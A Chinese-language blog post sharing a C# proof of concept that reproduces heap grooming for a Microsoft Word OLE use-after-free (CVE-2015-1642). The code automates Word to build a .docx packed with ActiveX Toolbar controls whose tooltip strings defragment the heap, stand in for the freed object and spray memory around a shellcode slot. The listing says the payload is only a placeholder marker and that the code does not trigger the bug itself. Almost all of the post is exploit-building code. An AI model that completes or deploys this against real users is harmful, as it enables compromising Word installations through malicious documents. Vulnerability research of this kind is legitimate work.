月初，玄武实验室的“每日安全动态”推送了一篇 Office UAF 漏洞利用的文章，之前对 Office 上 UAF 漏洞利用占位问题有些疑问，刚好就借助这篇文章重现了一下。其中堆喷射部分不是特别稳定，漏洞成因和利用的细节请参见原文链接。今天想起来，就把 POC 发这里吧。
原文链接：Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 CTaskSymbol UAF by @d0mzw https://t.co/NPJUJUqNSH
namespace WindowsFormsApplication1
{
    /// <summary>
    /// WinForms driver that automates Word over COM to build the test document
    /// discussed in the post above. It inserts MSComctlLib.Toolbar OLE controls
    /// whose button ToolTipText strings are sized by the original author to
    /// shape the Word process heap, then saves the result as test.docx next to
    /// the executable. No line in this listing exercises the vulnerability
    /// itself (CVE-2015-1642, per the post); the code only produces the file.
    /// The size constants are taken from the linked write-up and are not
    /// explained here.
    ///
    /// Note for detection work: the generated document embeds 34
    /// MSComctlLib.Toolbar ActiveX controls (30 from HeapSpray plus ocx[0..3])
    /// carrying long, highly repetitive UTF-16 tooltip strings.
    /// </summary>
    public partial class Form1 : Form
    {
        /// <summary>
        /// Designer-generated initialization; InitializeComponent lives in the
        /// other part of this partial class (not shown on this page).
        /// </summary>
        public Form1()
        {
            InitializeComponent();
        }

        /// <summary>
        /// Adds 30 Toolbar controls to <paramref name="objDoc"/> and assigns the
        /// same large string to a new button's ToolTipText twice per control
        /// (60 assignments in total). The string is a repeated 0x800-character
        /// block: 1267 chars of padding, a 2-char marker in place of a payload,
        /// and 0x9090 filler; the whole string is just under 0x100000 bytes.
        /// The post describes this part as the least stable step.
        /// </summary>
        /// <param name="objDoc">Open Word document that receives the controls.</param>
        private void HeapSpray(Word.Document objDoc)
        {
            // Local to this method; unrelated to the 4-element ocx array used by the other helpers.
            Word.InlineShape[] ocx = new Word.InlineShape[30];
            MSComctlLib.Toolbar[,] toolbarArray = new MSComctlLib.Toolbar[30, 2];

            // Upper bound used while growing the filler pattern below.
            int block_size = 0x1000;

            // Grow the padding to at least 0x1000 chars, then cut it to (0x9f2 - 0xc) / 2 = 1267 chars.
            string padding = "\u8080\u8080";
            while (padding.Length < 0x1000)
            {
                padding += "\u2121\u2121";
            }
            padding = padding.Substring(0, (0x9f2 - 0xc) / 2);

            // 0a0a0a0a points here (author's note). Only a two-character marker
            // is present; no actual payload is part of this listing.
            string shellcode = "\uC0DE\uC0DE";

            // Filler sized so that padding + marker + filler is exactly 0x800 chars
            // (0x1000 bytes as UTF-16).
            string pattern = "\u9090\u9090";
            while (pattern.Length < block_size)
            {
                pattern += pattern;
            }
            pattern = pattern.Substring(0, 0x800 - padding.Length - shellcode.Length);

            // Repeat the 0x800-char block until it reaches 0xfffe0 / 2 chars,
            // then trim to (0xfffe0 - 0x6) / 2 chars.
            string block = padding + shellcode + pattern;
            while (block.Length < 0xfffe0 / 2)
            {
                block += block;
            }

            string chunk = block.Substring(0, (0xfffe0 - 0x6) / 2);

            // Debug aid left by the author: reports chunk bytes + 6 (= 0xfffe0) in hex.
            //MessageBox.Show("[+] objAlloc size: 0x" + (chunk.Length * 0x2 + 0x4 + 0x2).ToString("X"));

            // One control per i; the inner loop assigns the same string to two
            // freshly added buttons of that control.
            for (int i = 0; i < 30; i++)
            {
                ocx[i] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");
                for (int j = 0; j < 2; j++)
                {
                    toolbarArray[i, j] = ((MSComctlLib.Toolbar)ocx[i].OLEFormat.Object);
                    toolbarArray[i, j].Buttons.Add().ToolTipText = chunk;
                }
            }
        }

        /// <summary>
        /// ("Defragment" is meant; name kept as in the original.) Adds two Toolbar
        /// controls (stored in ocx[2] and ocx[3]) and gives each 16 buttons whose
        /// ToolTipText is a 45-char (0x5a / 2) string of U+0C0C. Per the post,
        /// the intent is to fill small free holes before the large spray runs.
        /// </summary>
        /// <param name="objDoc">Open Word document that receives the controls.</param>
        /// <param name="ocx">Caller-owned array; slots 2 and 3 are written here.</param>
        private void DefragmenHeap(Word.Document objDoc, Word.InlineShape[] ocx)
        {
            // Grow to >= 0x60 / 2 = 48 chars, then cut to 0x5a / 2 = 45 chars.
            string paddingB = "\u0c0c\u0c0c";
            while (paddingB.Length < 0x60 / 2)
            {
                paddingB += paddingB;
            }
            string objAllocB = paddingB.Substring(0, 0x5a / 2);

            MSComctlLib.Toolbar[] tabArrayB = new MSComctlLib.Toolbar[16];
            ocx[2] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            // Every slot of tabArrayB refers to the same Toolbar object; the
            // repeated cast only re-fetches it before each Buttons.Add().
            for (int j = 0; j < 16; j++)
            {
                tabArrayB[j] = (MSComctlLib.Toolbar)ocx[2].OLEFormat.Object;
                tabArrayB[j].Buttons.Add().ToolTipText = objAllocB;
            }

            MSComctlLib.Toolbar[] tabArrayC = new MSComctlLib.Toolbar[16];
            ocx[3] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            for (int j = 0; j < 16; j++)
            {
                tabArrayC[j] = (MSComctlLib.Toolbar)ocx[3].OLEFormat.Object;
                tabArrayC[j].Buttons.Add().ToolTipText = objAllocB;
            }
        }

        /// <summary>
        /// Adds one Toolbar control (stored in ocx[0]) with 16 buttons whose
        /// ToolTipText is a 45-char (0x5a / 2) string built from "\u0a06\u0a0a".
        /// Same construction as DefragmenHeap with a different fill value; the
        /// post explains which freed object this is meant to stand in for.
        /// </summary>
        /// <param name="objDoc">Open Word document that receives the control.</param>
        /// <param name="ocx">Caller-owned array; slot 0 is written here.</param>
        private void ReplaceHeap(Word.Document objDoc, Word.InlineShape[] ocx)
        {
            // Note the first character is U+0A06, not U+0A0A, as written by the author.
            string paddingA = "\u0a06\u0a0a";
            while (paddingA.Length < 0x60 / 2)
            {
                paddingA += paddingA;
            }
            string objAllocA = paddingA.Substring(0, 0x5a / 2);

            MSComctlLib.Toolbar[] tabArrayA = new MSComctlLib.Toolbar[16];
            ocx[0] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            for (int j = 0; j < 16; j++)
            {
                tabArrayA[j] = (MSComctlLib.Toolbar)ocx[0].OLEFormat.Object;
                tabArrayA[j].Buttons.Add().ToolTipText = objAllocA;
            }
        }

        /// <summary>
        /// Button handler that drives the whole build: starts a visible Word
        /// instance, creates a blank document, then runs ReplaceHeap, inserts a
        /// bare control at ocx[1], runs DefragmenHeap and finally HeapSpray — in
        /// that order, since each step's allocations are meant to land relative
        /// to the previous ones (see post). The document is saved as
        /// "&lt;StartupPath&gt;\test.docx" and Word is shut down.
        /// </summary>
        /// <param name="sender">Unused.</param>
        /// <param name="e">Unused.</param>
        private void button1_Click(object sender, EventArgs e)
        {
            Word.Application objWord = new Word.Application();
            objWord.Visible = true;

            // Placeholder for the optional ref parameters of the Word interop calls.
            object objMissing = System.Reflection.Missing.Value;
            Word.Document objDoc = objWord.Documents.Add(ref objMissing, ref objMissing, ref objMissing, ref objMissing);

            // How to: Programmatically Insert Text into Word Documents;
            // https://msdn.microsoft.com/en-us/library/6b9478cs.aspx

            // Shared slots: [0] ReplaceHeap, [1] set below, [2]/[3] DefragmenHeap.
            Word.InlineShape[] ocx = new Word.InlineShape[4];

            ReplaceHeap(objDoc, ocx);

            // A control with no buttons added, placed between the two small-string steps.
            ocx[1] = objDoc.InlineShapes.AddOLEControl("MSComctlLib.Toolbar");

            DefragmenHeap(objDoc, ocx);

            HeapSpray(objDoc);

            // Save, close and quit, then drop the COM references ("Null out the
            // reference" in the author's words). NOTE(review): there is no
            // try/finally or Marshal.ReleaseComObject, so if any interop call
            // above throws, the visible Word instance is presumably left running.
            object filename = Application.StartupPath + @"\test.docx";
            objDoc.SaveAs2(ref filename);
            objDoc.Close(ref objMissing, ref objMissing, ref objMissing);
            objDoc = null;
            objWord.Quit(ref objMissing, ref objMissing, ref objMissing);
            objWord = null;
        }
    }
}